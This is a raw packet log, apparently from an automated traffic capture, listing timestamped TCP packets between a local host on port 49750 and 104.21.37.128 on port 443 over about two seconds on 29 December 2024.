                                                                                                                                                  Dec 29, 2024 16:37:17.688908100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.688958883 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.688982010 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.688998938 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.689026117 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.694627047 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.694644928 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.694681883 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.694689989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.694717884 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.694747925 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.700454950 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.700469971 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.700506926 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.700514078 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.700539112 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.700550079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.703176022 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.703262091 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.703269005 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.706552029 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.706607103 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.706614017 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.753324986 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.867563009 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.867587090 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.867677927 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.867702961 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.867752075 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.870383024 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.870459080 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.870466948 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.875715017 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.875730991 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.875802994 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.875812054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.881845951 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.881860018 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.881927013 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.881937027 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.887679100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.887691975 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.887747049 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.887756109 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.887787104 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.893816948 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.893834114 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.893908024 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.893919945 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.899343967 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.899358988 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.899425983 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.899444103 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.904731035 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.904750109 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.904901028 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.904910088 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.910720110 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.910733938 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.910793066 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.910801888 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.956429005 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.071794033 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.071806908 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.071849108 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.071872950 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.071897984 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.071918964 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.071953058 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.077792883 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.077819109 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.077874899 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.077898979 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.077936888 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.083112955 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.083137989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.083183050 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.083200932 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.083220959 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.083245039 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.089046955 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.089073896 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.089114904 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.089133024 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.089150906 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.089173079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.095078945 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.095109940 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.095151901 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.095177889 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.095196962 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.095216990 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.100366116 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.100403070 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.100435019 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.100440979 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.100474119 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.100486994 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.106712103 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.106728077 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.106787920 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.106794119 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.106852055 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.112103939 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.112118006 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.112179995 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.112210989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.112260103 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.273230076 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.273262024 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.273314953 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.273353100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.273374081 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.273552895 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.279228926 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.279244900 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.279289007 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.279304981 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.279342890 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.284513950 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.284531116 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.284584045 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.284598112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.284636974 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.290581942 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.290596962 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.290637970 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.290649891 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.290664911 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.293575048 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.296503067 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.296519995 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.296562910 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.296574116 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.296616077 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.301784992 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.301800966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.301872969 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.301883936 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.301925898 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.308178902 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.308195114 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.308326006 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.308337927 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.308485985 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.313463926 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.313479900 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.313551903 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.313563108 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.313602924 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.474684954 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.474714994 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.474925995 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.474925995 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.474962950 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.476799011 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.480551958 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.480576038 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.480638027 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.480644941 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.480675936 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.480695963 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.485966921 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.485989094 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.486057043 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.486064911 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.486109972 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.491990089 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.492018938 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.492069960 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.492074966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.492108107 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.492117882 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.497823000 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.497838974 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.497905016 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.497911930 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.497958899 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.503897905 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.503917933 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.503966093 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.503972054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.504003048 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.504023075 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.509497881 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.509517908 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.509578943 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.509584904 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.509627104 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.514807940 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.514823914 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.514902115 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.514909029 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.514955044 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.676048994 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.676067114 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.676146984 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.676181078 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.676233053 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.681972980 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.681988955 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.682070971 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.682079077 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.682127953 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.687180042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.687195063 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.687257051 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.687263966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.687311888 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.693300962 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.693315983 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.693382978 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.693389893 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.693437099 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.699244976 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.699261904 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.699342966 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.699350119 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.699400902 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.705285072 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.705311060 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.705476999 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.705483913 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.705557108 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.710874081 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.710891962 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.710971117 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.710978985 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.711018085 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.716188908 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.716219902 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.716276884 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.716285944 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.716319084 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.716330051 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.877387047 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.877407074 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.877562046 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.877563000 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.877604008 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.877701044 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.883311033 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.883332014 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.883379936 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.883387089 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.883420944 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.883431911 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.889389992 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.889408112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.889446020 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.889452934 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.889477968 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.889492035 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.894746065 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.894763947 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.894802094 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.894809008 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.894841909 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.894861937 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.900640011 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.900655985 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.900717974 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.900727034 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.900768042 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.906687975 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.906707048 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.906784058 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.906794071 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.906836987 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.912344933 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.912367105 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.912434101 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.912442923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.912484884 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.918320894 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.918359041 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.918406963 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.918415070 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:18.918440104 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:18.918450117 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.078797102 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.078826904 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.078984022 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.078984022 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.079022884 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.081655025 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.084722042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.084739923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.084808111 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.084816933 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.084856987 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.090715885 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.090733051 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.090801954 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.090810061 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.090854883 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.096075058 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.096091032 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:19.096157074 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:19.096164942 CET44349750104.21.37.128192.168.2.4
